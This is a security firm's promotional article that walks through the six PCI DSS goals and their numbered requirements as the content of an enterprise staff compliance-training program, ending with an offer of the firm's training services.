Companies that accept credit card payments and store or process cardholder data (CHD) need to comply with the Payment Card Industry (PCI) Data Security Standard (DSS). The best way to ensure compliance across your staff is to conduct rigorous PCI training sessions covering all required responsibilities to protect CHD.
Essential Topics for Enterprise PCI Compliance Training
An enterprise’s PCI compliance training program should focus on the six goals from the DSS:
- PCI DSS Goal #1: Building Secure Networks and Systems
- PCI DSS Goal #2: Safeguarding All Cardholder Data (CHD)
- PCI DSS Goal #3: Maintaining Vulnerability Management
- PCI DSS Goal #4: Implementing Access Control Measures
- PCI DSS Goal #5: Monitoring and Testing Networks Regularly
- PCI DSS Goal #6: Maintaining Information Security Policies
Companies should break down the Requirements and primary sub-requirements within each, along with guidance on how each individual can ensure they are actively following each one.
PCI DSS Goal #1: Building Secure Networks and Systems
The most foundational aim of the PCI DSS—and your PCI training program—concerns basic cybersecurity architecture implementation. The first goal incorporates this aim within its two Requirements:
- Requirement 1 – Establish and update firewall configurations to protect cardholder data:
- 1.1: Establish router and firewall configurations, including formalized connection approvals and explicit, up-to-date documentation of data, users, environment, etc.
- 1.2: Ensure router and firewall configurations restrict connections between CHD environments and external, unprotected networks, denying all unnecessary traffic.
- 1.3: Restrict direct public access to system components in the CHD environment via demilitarized zone (DMZ), anti-spoofing protections, and logical separations.
- 1.4: Install firewall configurations on devices owned or operated by personnel (including personal devices) that connect to networks outside company control.
- 1.5: Formalize policies and procedures pertaining to firewall and router security configurations and ensure that documentation is accessible to all stakeholders.
- Requirement 2 – Replace all default security configurations supplied by your vendors:
- 2.1: Remove vendor-supplied default settings and eliminate unnecessary default accounts prior to installing physical or virtual assets within system components.
- 2.2: Establish standards and protocols for setting configurations across all system components and limit all functions or services to minimum requirements.
- 2.3: Use complex cryptography to encrypt all non-console administrative access to system components containing CHD or connected to the CHD environment.
- 2.4: Maintain an updated inventory of all physical and virtual assets and other system components that are in scope for applicable PCI DSS Requirements.
- 2.5: Formalize policies and procedures pertaining to vendor-supplied settings replacement and ensure that documentation is accessible to all stakeholders.
- 2.6: Ensure all shared hosting providers safeguard every entity’s hosted environment, including all CHD presided over by the third-party vendor.
PCI DSS Goal #2: Safeguarding All Cardholder Data (CHD)
The PCI DSS’s second goal is establishing protections for all cardholder data—both in storage and in transit—per two Requirements. Make sure your PCI training addresses:
- Requirement 3 – Safeguard cardholder data stored internally on secure servers:
- 3.1: Minimize the amount of CHD stored through safe retention and disposal policies, regularly scanning for and deleting CHD that is no longer needed.
- 3.2: Ensure no authorization data is stored, even if encrypted, unless necessary; this pertains to all card and personally identifiable data.
- 3.3: Mask the display of primary account numbers (PAN) in all instances, minimizing display to the first six or last four digits of the number.
- 3.4: Render PANs unreadable in all places in which they are stored with one-way hashes, truncation, index tokens, strong cryptography, or equivalent measures.
- 3.5: Establish, implement, and clearly document procedures for protecting keys used to secure all stored CHD against inappropriate access, use, or disclosure.
- 3.6: Establish, implement, and clearly document all procedures for generating, distributing, and storing all strong cryptographic keys used to secure CHD.
- 3.7: Formalize policies and procedures pertaining to safeguarding CHD in storage and ensure that documentation is accessible to all stakeholders.
- Requirement 4 – Encrypt cardholder data for transmission over unsecured networks:
- 4.1: Utilize strong cryptographic key protocols to secure all CHD for transmission on open, public networks; ensure only trusted, appropriated keys are accepted.
- 4.2: Ensure PANs are never sent nor processed through end-user messaging platforms (e.g., email, SMS messaging, instant messages, chats).
- 4.3: Formalize policies and procedures pertaining to encrypting CHD for safe transmission and ensure that documentation is accessible to all stakeholders.
PCI DSS Goal #3: Maintaining Vulnerability Management
The third aim within the PCI DSS framework concerns threat and vulnerability management. Therefore, a robust PCI training program needs to detail the following Requirements and sub-requirements:
- Requirement 5 – Protect against malware with regular updates to antivirus software:
- 5.1: Install antivirus software capable of detection and removal on all physical and virtual assets commonly targeted by malware (computers, etc.).
- 5.2: Ensure all antivirus software and other mechanisms are kept up to date, perform scans at regular intervals, and log all audits per Requirement 10.7.
- 5.3: Ensure continuous functionality of all antivirus software and ensure that no users can alter or disable antivirus programs unless directed to by management.
- 5.4: Formalize policies and procedures pertaining to vulnerability management maintenance and ensure that documentation is accessible to all stakeholders.
- Requirement 6 – Develop secure applications and systems and maintain their security:
- 6.1: Establishes processes for identifying vulnerabilities and risks, using outside authoritative sources to generate internal threat intelligence ranking systems.
- 6.2: Protect all system components from known vulnerabilities by installing all secure vendor-supplied patches and updates within one month of their release.
- 6.3: Develop applications for internal and external use per all other PCI DSS Requirements, along with industry-specific regulations and best practices.
- 6.4: Adhere to secure change control processes (e.g., logical separations, removal of CHD, change logging) for all changes to all system components.
- 6.5: Address all threats and vulnerabilities common to coding environments, (e.g., injection flaws, buffer overflows) with training and explicit guidelines.
- 6.6: Review public-facing web applications regularly for vulnerabilities, manually or using automated procedures, and address vulnerabilities with regular updates.
- 6.7: Formalize policies and procedures pertinent to developing secure systems and applications and ensure that documentation is accessible to all stakeholders.
PCI DSS Goal #4: Implementing Access Control Measures
The fourth aim of PCI DSS involves access control via identity management and physical or proximal safeguards. PCI DSS compliance training should cover the following access control Requirements:
- Requirement 7 – Restrict all cardholder data access by “business need to know”:
- 7.1: Limit all access to system components containing or connected to CHD to individuals whose job descriptions specify a need to access these systems.
- 7.2: Establish access control restrictions that “deny all” requests for data access that don’t meet specific needs related to business functions or job descriptions.
- 7.3: Formalize policies and procedures pertaining to business-necessary access restrictions and ensure that documentation is accessible to all stakeholders.
- Requirement 8 – Authenticate identities of all individuals granted system access:
- 8.1: Establish and implement policies governing user identity management, including safe assignment and removal of IDs and lockouts for user inactivity.
- 8.2: Use a multifactor authentication (MFA) system with possession, identity, or maximally strong knowledge factors for non-consumer and administrator users.
- 8.3: Require MFA for all non-console administrative access to CHD and for all remote access to CHD or its storage environments, regardless of user identity.
- 8.4: Communicate required authentication procedures to all users and provide guidance on developing strong credentials and general account maintenance habits.
- 8.5: Disable, prohibit, and remove all generic, shared, or otherwise non-unique user IDs and credentials for access to all system components containing CHD.
- 8.6: Extend safeguards to alternative access control methods (e.g., physical or logical separations) so that users cannot share individual credentials.
- 8.7: Secure all access to databases containing CHD so that all queries occur programmatically, only administrators can query, and only apps utilize IDs.
- 8.8: Formalize user authentication policies and procedures and ensure that documentation is accessible to all stakeholders.
- Requirement 9 – Restrict physical access to systems containing cardholder data:
- 9.1: Restrict and monitor physical access to systems containing or connected to CHD with surveillance devices (e.g., cameras) and physical barriers (e.g., security code doors).
- 9.2: Develop mechanisms to swiftly and easily distinguish personnel from on-site visitors and adjust or revoke permissions and access privileges, as needed.
- 9.3: Restrict all physical access to sensitive areas for all personnel; authorization must be based on job-function necessity and subject to immediate removal.
- 9.4: Implement policies to authorize (badge) all visitors before entering sensitive spaces, provide escorts, retrieve badges upon departure, and log all visits.
- 9.5: Secure all media physically, including secure storage of backups in a distinct, physically secured location—ideally off-site and subject to annual security audits at a minimum.
- 9.6: Strictly control all media’s internal and external distribution by classifying it, sending it through secured couriers with tracking, and approving all movements.
- 9.7: Implement maximal control over all physical media storage and accessibility, including compiling inventory logs and conducting audits at regular intervals (at least annually).
- 9.8: Ensure media is safely destroyed (e.g., incinerated, shredded) when its retention is no longer required for a business, legal, mission, or other reason.
- 9.9: Safeguard all devices that come into physical contact with credit cards to collect payment data; ensure they are not tampered with, destroyed, etc.
- 9.10: Formalize policies and procedures pertaining to restricting all physical access to CHD and ensure that documentation is accessible to all stakeholders.
PCI DSS Goal #5: Monitoring and Testing Networks Regularly
The fifth aim of the PCI DSS framework concerns assessing the efficacy of security measures through access monitoring and system audits, per two Requirements. This element of PCI training should cover:
- Requirement 10 – Monitor all cardholder data access via networks and resources:
- 10.1: Compile “audit trails” to all user data access sessions, documenting each individual session’s behavior and characteristics for later analysis.
- 10.2: Implement automated audit trails within system components containing or connected to CHD to analyze administrative functions and behaviors further.
- 10.3: Record the type of event, date and time, user ID, indication success, and characteristics of impacted data or system components for all monitored events.
- 10.4: Utilize time-synchronization technology to synchronize all system clocks connected to components in the CHD environment and protect all time data.
- 10.5: Secure audit trails to prevent all unauthorized viewing or modification; back up all audit trail logs and implement file integrity monitoring (FIM).
- 10.6: Review audit trails, security events, and logs across all system components regularly to detect, identify, and address any suspicious or anomalous activities.
- 10.7: Retain all audit trail history for a minimum of one year and ensure that at least the three most recent months’ data is immediately and easily accessible.
- 10.8: Implement processes to detect, report on, and address any critical security system component failures. Note that this sub-requirement is only applicable to service providers.
- 10.9: Formalize policies and procedures pertaining to monitoring network access and ensure that documentation is accessible to all stakeholders.
- Requirement 11 – Perform regular assessments on security systems and processes:
- 11.1: Implement policies and procedures to monitor, detect, and identify all wireless access points to compile an inventory and develop an incident response plan for unauthorized detections; scan at least quarterly.
- 11.2: Conduct regular internal and external network scans (at least quarterly) and special scans after all significant changes to enterprise network infrastructure.
- 11.3: Implement regular penetration testing, including external and internal tests at least annually and after all significant changes; address all identified threats.
- 11.4: Monitor traffic and access to the CHD environments and notify stakeholders when suspected compromises occur, using intrusion detection/prevention tools.
- 11.5: Alert stakeholders when unauthorized modifications to critical files occur, using FIM or change-detection tools; perform file comparisons at least weekly.
- 11.6: Formalize policies and procedures pertaining to assessing security systems and processes and ensure that documentation is accessible to all stakeholders.
PCI DSS Goal #6: Maintaining Information Security Policies
The final aim of PCI DSS compliance is to formalize all other security policies and procedures in readily accessible documents, per one requirement. PCI training should be considered part of your efforts to meet this goal. Make sure your staff is aware by covering:
- Requirement 12 – Maintain policies addressing security responsibilities for all staff:
- 12.1: Disseminate a formal security policy; review and adjust it as needed (see Requirements 1.5, 2.5, 3.7, 4.3, 5.4, 6.7, 7.3, 8.8, 9.10, 10.9, and 11.6 above).
- 12.2: Implement risk assessment processes to be performed at regular intervals (at least annually), identifying and documenting critical threats and vulnerabilities.
- 12.3: Develop and disseminate proper use policies for all technologies, covering approval, authentication, inventory, accepted uses, and protocols for use control.
- 12.4: Ensure that formal security policies and procedures define clear roles and responsibilities for all personnel and that the policies are all easily accessible.
- 12.5: Assign responsibilities for documenting and distributing policies, monitoring behaviors, responding to incidents, maintaining accounts, and controlling access.
- 12.6: Implement formalized security awareness programming to ensure all personnel know the PCI DSS requirements and institutionally defined roles.
- 12.7: Screen individuals before and during hiring and onboarding, including background and reference checks, to reduce the potential for insider attacks.
- 12.8: Maintain a third party risk management (TPRM) program to monitor and contractually guarantee CHD safety with third parties who process or contact it.
- 12.9: Acknowledge to customers formally that service providers possess or process their CHD or other data. Note that this sub-requirement is only applicable to service providers.
- 12.10: Implement a robust incident management program, ensuring readiness to respond to incidents in real time and minimize the extent of data leakage or loss.
- 12.11: Perform reviews at regular intervals (at least quarterly) to ensure that all personnel uphold DSS Requirements. Note that this sub-requirement is only applicable to service providers.
Rethink Your PCI Training, Compliance, and Security
RSI Security offers various PCI compliance services, including but not limited to comprehensive PCI DSS compliance training. To select individual PCI training modules for your entire staff or tailored workshops for select segments, contact RSI Security today!
We’ll help you rethink your company’s PCI compliance, cardholder data security, and overall cyberdefense.